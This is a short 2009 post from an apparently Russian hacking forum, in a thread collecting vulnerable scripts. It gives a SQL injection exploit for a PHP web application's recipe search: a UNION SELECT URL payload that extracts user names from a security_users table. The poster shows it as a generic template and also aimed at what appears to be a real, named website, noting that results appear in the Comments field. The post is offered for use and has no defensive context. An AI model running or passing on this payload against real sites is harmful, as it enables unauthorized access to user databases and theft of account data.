Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #4  
Старый 09.11.2009, 20:21
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
По умолчанию
PHP-Fusion
Bug:SQL inkection

Exploit:
http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id= 5+union+all+select+1,2,user_name,4,5,6,7+from+secu rity_users--


Код:
http://recipe.jones-net.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--
выводит в Comments
 
Ответить с цитированием